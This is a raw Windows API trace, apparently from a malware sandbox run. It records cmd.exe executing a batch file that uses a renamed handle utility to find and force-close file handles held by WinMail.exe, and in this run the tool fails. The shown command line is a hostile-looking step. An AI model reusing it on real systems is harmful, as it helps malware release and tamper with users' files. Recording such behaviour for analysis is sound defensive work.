returned 0x7 [0241.648] GetFileType (hFile=0x7) returned 0x2 [0241.648] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0241.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.649] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0241.650] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0241.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.650] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf050 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0241.650] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf050 | out: _Buffer=">") returned 1 [0241.650] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.650] GetFileType (hFile=0x7) returned 0x2 [0241.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.651] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf018 | out: lpMode=0x2cf018) returned 1 [0241.651] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.651] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf044, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cf044*=0x26) returned 1 [0241.652] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x2cf2d4 | out: _Buffer="FOR") returned 3 [0241.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.652] GetFileType (hFile=0x7) returned 0x2 [0241.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.652] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x3) returned 1 [0241.653] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2cf2d4 | out: _Buffer=" /F") returned 3 [0241.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.653] GetFileType (hFile=0x7) returned 0x2 [0241.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.653] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.653] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x3) returned 1 [0241.654] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x2cf2d4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0241.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.654] GetFileType (hFile=0x7) returned 0x2 [0241.655] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.655] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x20) returned 1 [0241.655] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x2cf2d4 | out: _Buffer=" %I IN ") returned 7 [0241.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.655] GetFileType (hFile=0x7) returned 0x2 [0241.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x7) returned 1 [0241.658] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x2cf2d0 | out: _Buffer="(`tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner`) DO ") returned 56 [0241.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.658] GetFileType (hFile=0x7) returned 0x2 [0241.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf290 | out: lpMode=0x2cf290) returned 1 [0241.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.658] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0x2cf2bc, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2bc*=0x38) returned 1 [0241.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.659] GetFileType (hFile=0x7) returned 0x2 [0241.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.659] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf29c | out: lpMode=0x2cf29c) returned 1 [0241.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.659] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2cf2c8, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2cf2c8*=0x1) returned 1 [0241.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.660] GetFileType (hFile=0x7) returned 0x2 [0241.660] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf280 | out: lpMode=0x2cf280) returned 1 [0241.660] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.660] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x531298*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf2ac, lpReserved=0x0 | out: lpBuffer=0x531298*, lpNumberOfCharsWritten=0x2cf2ac*=0xc) returned 1 [0241.661] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2b8 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0241.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.661] GetFileType (hFile=0x7) returned 0x2 [0241.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf278 | out: lpMode=0x2cf278) returned 1 [0241.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf2a4, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2a4*=0x26) returned 1 [0241.663] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2d4 | out: _Buffer=") ") returned 2 [0241.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.663] GetFileType (hFile=0x7) returned 0x2 [0241.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.664] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.664] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x2) returned 1 [0241.664] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf2f4 | out: _Buffer="\r\n") returned 2 [0241.664] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.664] GetFileType (hFile=0x7) returned 0x2 [0241.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.665] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf2b4 | out: lpMode=0x2cf2b4) returned 1 [0241.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.665] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2e0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2e0*=0x2) returned 1 [0241.666] GetProcessHeap () returned 0x530000 [0241.666] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2c) returned 0x544350 [0241.666] GetProcessHeap () returned 0x530000 [0241.666] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xc) returned 0x530ce8 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xc) returned 0x530d00 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe) returned 0x530d18 [0241.667] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0241.667] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0241.667] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0241.667] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0241.667] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0241.667] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0241.667] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0241.667] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x2cf210, _Radix=0 | out: _EndPtr=0x2cf210*=",6 delims=: \"") returned 3 [0241.667] wcstol (in: _String="6 delims=: \"", _EndPtr=0x2cf210, _Radix=0 | out: _EndPtr=0x2cf210*=" delims=: \"") returned 6 [0241.667] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0241.667] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0241.667] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0241.667] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530d18 | out: hHeap=0x530000) returned 1 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe) returned 0x530d18 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x530ce8, Size=0xe) returned 0x530d30 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x530d30) returned 0xe [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x530d00, Size=0x14) returned 0x544388 [0241.667] GetProcessHeap () returned 0x530000 [0241.667] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544388) returned 0x14 [0241.667] _wpopen (_Command="tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner", _Mode="rb") returned 0x77032960 [0241.684] feof (_File=0x77032960) returned 0 [0241.684] ferror (_File=0x77032960) returned 0 [0241.684] GetProcessHeap () returned 0x530000 [0241.684] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x108) returned 0x5443a8 [0241.684] fgets (in: _Buf=0x5443b0, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0243.853] feof (_File=0x77032960) returned 0 [0243.853] ferror (_File=0x77032960) returned 0 [0243.853] GetProcessHeap () returned 0x530000 [0243.853] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5443a8, Size=0x208) returned 0x5443a8 [0243.853] GetProcessHeap () returned 0x530000 [0243.853] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5443a8) returned 0x208 [0243.853] fgets (in: _Buf=0x5443f6, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0243.853] feof (_File=0x77032960) returned 0 [0243.853] ferror (_File=0x77032960) returned 0 [0243.853] GetProcessHeap () returned 0x530000 [0243.853] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5443a8, Size=0x308) returned 0x5443a8 [0243.853] GetProcessHeap () returned 0x530000 [0243.853] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5443a8) returned 0x308 [0243.853] fgets (in: _Buf=0x5443f9, _MaxCount=695, _File=0x77032960 | out: _Buf="", _File=0x77032960) returned 0x0 [0244.052] _pclose (in: _File=0x77032960 | out: _File=0x77032960) returned 1 [0244.052] GetProcessHeap () returned 0x530000 [0244.052] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5443a8, Size=0x9e) returned 0x5443a8 [0244.052] GetProcessHeap () returned 0x530000 [0244.052] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5443a8) returned 0x9e [0244.052] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x5443f9, cbMultiByte=73, lpWideCharStr=0x5443b0, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0244.053] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cef04 | out: _Buffer="\r\n") returned 2 [0244.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.053] GetFileType (hFile=0x7) returned 0x2 [0244.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceec4 | out: lpMode=0x2ceec4) returned 1 [0244.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.055] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ceef0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ceef0*=0x2) returned 1 [0244.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.056] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cef00 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0244.056] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cef00 | out: _Buffer=">") returned 1 [0244.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.056] GetFileType (hFile=0x7) returned 0x2 [0244.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceec8 | out: lpMode=0x2ceec8) returned 1 [0244.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.057] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2ceef4, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2ceef4*=0x26) returned 1 [0244.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.058] GetFileType (hFile=0x7) returned 0x2 [0244.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf14c | out: lpMode=0x2cf14c) returned 1 [0244.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.058] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2cf178, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x2cf178*=0x1) returned 1 [0244.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.059] GetFileType (hFile=0x7) returned 0x2 [0244.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.059] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf130 | out: lpMode=0x2cf130) returned 1 [0244.059] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.059] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x554b00*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf15c, lpReserved=0x0 | out: lpBuffer=0x554b00*, lpNumberOfCharsWritten=0x2cf15c*=0xc) returned 1 [0244.059] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf168 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0244.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.060] GetFileType (hFile=0x7) returned 0x2 [0244.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.066] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf128 | out: lpMode=0x2cf128) returned 1 [0244.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.066] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2cf154, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf154*=0x2c) returned 1 [0244.068] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf184 | out: _Buffer=") ") returned 2 [0244.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.068] GetFileType (hFile=0x7) returned 0x2 [0244.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf144 | out: lpMode=0x2cf144) returned 1 [0244.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf170, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf170*=0x2) returned 1 [0244.069] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf1a4 | out: _Buffer="\r\n") returned 2 [0244.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.069] GetFileType (hFile=0x7) returned 0x2 [0244.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.069] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf164 | out: lpMode=0x2cf164) returned 1 [0244.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0244.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf190*=0x2) returned 1 [0244.071] GetConsoleTitleW (in: lpConsoleTitle=0x2cecb4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.073] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5446f8, lpFilePart=0x2ce7d4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ce7d4*="Desktop") returned 0x25 [0244.073] SetErrorMode (uMode=0x0) returned 0x1 [0244.073] GetProcessHeap () returned 0x530000 [0244.073] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5446f0, Size=0x6e) returned 0x5446f0 [0244.073] GetProcessHeap () returned 0x530000 [0244.073] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5446f0) returned 0x6e [0244.073] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0244.073] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0244.073] GetProcessHeap () returned 0x530000 [0244.073] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x544768 [0244.073] GetProcessHeap () returned 0x530000 [0244.073] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x544890 [0244.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.074] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x2ce570, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce570) returned 0x544a40 [0244.074] FindClose (in: hFindFile=0x544a40 | out: hFindFile=0x544a40) returned 1 [0244.074] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0244.074] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0244.074] GetConsoleTitleW (in: lpConsoleTitle=0x2cea48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0244.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ce8d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ce998 | out: lpAttributeList=0x2ce8d0, lpSize=0x2ce998) returned 1 [0244.074] UpdateProcThreadAttribute (in: lpAttributeList=0x2ce8d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ce990, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ce8d0, lpPreviousValue=0x0) returned 1 [0244.074] GetStartupInfoW (in: lpStartupInfo=0x2ce88c | out: lpStartupInfo=0x2ce88c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0244.075] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0244.075] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ce92c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ce978 | out: lpCommandLine="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x2ce978*(hProcess=0x74, hThread=0x84, dwProcessId=0xaf0, dwThreadId=0x74c)) returned 1 [0244.087] CloseHandle (hObject=0x84) returned 1 [0244.088] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0244.088] GetProcessHeap () returned 0x530000 [0244.088] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x547690 | out: hHeap=0x530000) returned 1 [0244.088] GetEnvironmentStringsW () returned 0x546b08* [0244.088] GetProcessHeap () returned 0x530000 [0244.088] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb7e) returned 0x547690 [0244.088] FreeEnvironmentStringsW (penv=0x546b08) returned 1 [0244.088] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0245.494] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x2ce86c | out: lpExitCode=0x2ce86c*=0x1) returned 1 [0245.494] CloseHandle (hObject=0x74) returned 1 [0245.494] _vsnwprintf (in: _Buffer=0x2ce9b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ce878 | out: _Buffer="00000001") returned 8 [0245.495] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0245.495] GetProcessHeap () returned 0x530000 [0245.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x547690 | out: hHeap=0x530000) returned 1 [0245.495] GetEnvironmentStringsW () returned 0x546b08* [0245.495] GetProcessHeap () returned 0x530000 [0245.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb7e) returned 0x547690 [0245.495] FreeEnvironmentStringsW (penv=0x546b08) returned 1 [0245.495] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0245.495] GetProcessHeap () returned 0x530000 [0245.495] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x547690 | out: hHeap=0x530000) returned 1 [0245.495] GetEnvironmentStringsW () returned 0x546b08* [0245.495] GetProcessHeap () returned 0x530000 [0245.495] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb7e) returned 0x547690 [0245.495] FreeEnvironmentStringsW (penv=0x546b08) returned 1 [0245.495] GetProcessHeap () returned 0x530000 [0245.496] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530d00 | out: hHeap=0x530000) returned 1 [0245.496] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ce8d0 | out: lpAttributeList=0x2ce8d0) [0245.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0245.496] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0245.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0245.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0245.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0245.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0245.498] SetConsoleInputExeNameW () returned 0x1 [0245.498] GetConsoleOutputCP () returned 0x1b5 [0245.498] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0245.498] SetThreadUILanguage (LangId=0x0) returned 0x409 [0245.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0245.499] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 